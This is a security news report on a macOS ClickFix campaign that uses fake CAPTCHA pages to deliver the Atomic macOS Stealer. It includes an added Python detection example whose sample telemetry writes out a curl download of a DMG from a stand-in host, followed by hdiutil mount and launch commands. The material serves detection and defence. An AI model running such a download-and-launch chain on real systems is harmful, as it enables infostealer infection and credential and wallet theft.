Security researchers at Palo Alto Networks Unit 42 have uncovered a new macOS-focused ClickFix campaign that uses social engineering and native system tools to silently install the Atomic macOS Stealer (AMOS) infostealer. The attack relies on fake CAPTCHA pages that instruct users to open Terminal and paste a command, effectively tricking victims into executing malware under the guise of a verification step.
Once the command is executed, the malware is downloaded from an attacker-controlled server as a disk image (DMG) file using curl, then silently mounted using macOS’s built-in hdiutil utility. The script searches the mounted volume for application bundles or installers and automatically launches the malicious payload without requiring user interaction through Finder or standard macOS security prompts.
This ClickFix variant represents an evolution of earlier social engineering techniques by removing the need for manual file execution. Instead of relying on users opening downloaded files, the attack chain fully automates execution through Terminal commands. Researchers note that this significantly reduces friction for attackers and increases the likelihood of successful infection, especially among users unfamiliar with macOS command-line operations.
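The chain described above (curl fetches a DMG, hdiutil mounts it, the payload is launched from the mounted volume, all from a Terminal session) is what a detection rule can key on. The following is an added illustrative example, not code from Unit 42 or the report: it runs over constructed process-start telemetry with assumed field names and flags sessions where those three stages occur in order within a short window.

```python
from collections import defaultdict

# Constructed sample process-start telemetry (field names are assumptions):
# session 100 is a ClickFix-style chain, session 200 a benign manual DMG install.
SAMPLE_EVENTS = [
    {"ts": 10, "session": 100, "parent": "Terminal", "cmd": "curl -sL https://example.invalid/pkg.dmg -o /tmp/pkg.dmg"},
    {"ts": 12, "session": 100, "parent": "Terminal", "cmd": "hdiutil attach -nobrowse -quiet /tmp/pkg.dmg"},
    {"ts": 14, "session": 100, "parent": "Terminal", "cmd": "open /Volumes/Installer/Installer.app"},
    {"ts": 30, "session": 200, "parent": "Finder", "cmd": "hdiutil attach /Users/me/Downloads/tool.dmg"},
    {"ts": 35, "session": 200, "parent": "Finder", "cmd": "open /Applications/Safari.app"},
]
WINDOW_SECONDS = 120  # download -> mount -> launch must complete within this

def classify(cmd):
    """Map one command line to a ClickFix stage name, or None if unrelated."""
    argv = cmd.split()  # whitespace split is enough for this telemetry shape
    if not argv:
        return None
    tool, args = argv[0].rsplit("/", 1)[-1], argv[1:]  # tolerate /usr/bin/curl
    if tool == "curl" and any(a.lower().endswith(".dmg") for a in args):
        return "download"
    if tool == "hdiutil" and "attach" in args:
        return "mount"
    if tool == "open" and any(a.startswith("/Volumes/") for a in args):
        return "launch"
    return None

def find_clickfix_chains(events, window=WINDOW_SECONDS):
    """Return (session, parent of the download) for each session where download,
    mount and launch occur in that order within `window` seconds."""
    per_session = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev["cmd"])
        if stage:
            per_session[ev["session"]].append((ev["ts"], stage, ev["parent"]))
    hits = []
    for session, seq in per_session.items():
        start = after = parent = None
        for want in ("download", "mount", "launch"):
            match = [(ts, p) for ts, st, p in seq if st == want and (after is None or ts > after)]
            if not match:
                after = None  # stage missing or out of order: no chain
                break
            after, p = match[0]
            if start is None:
                start, parent = after, p
        if after is not None and after - start <= window:
            hits.append((session, parent))
    return hits
```

The parent of the first stage is returned alongside the session so an analyst can prioritise chains that began in a terminal, which is the ClickFix hallmark, over DMG handling driven by Finder.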
The payload delivered in this campaign belongs to the Atomic macOS Stealer family, a well-known infostealer designed to extract sensitive data from infected systems. It targets a wide range of information, including browser credentials, cookies, autofill data, cryptocurrency wallet files, Apple Keychain data, messaging app content, and locally stored documents. It also specifically targets multiple browsers across the Chromium- and Firefox-based ecosystems, as well as major cryptocurrency wallet applications.
In addition to data theft, the malware has been observed replacing legitimate installations of hardware wallet software such as Ledger Live and Trezor Suite with malicious versions to facilitate cryptocurrency theft. Stolen data is compressed into archives and exfiltrated to attacker-controlled servers, enabling large-scale credential harvesting and financial fraud.
The campaign highlights the growing abuse of macOS-native tools and user trust in system-level instructions. Security researchers warn that any prompt instructing users to execute Terminal commands as part of CAPTCHA verification or troubleshooting should be treated as highly suspicious, as legitimate services do not require such actions.
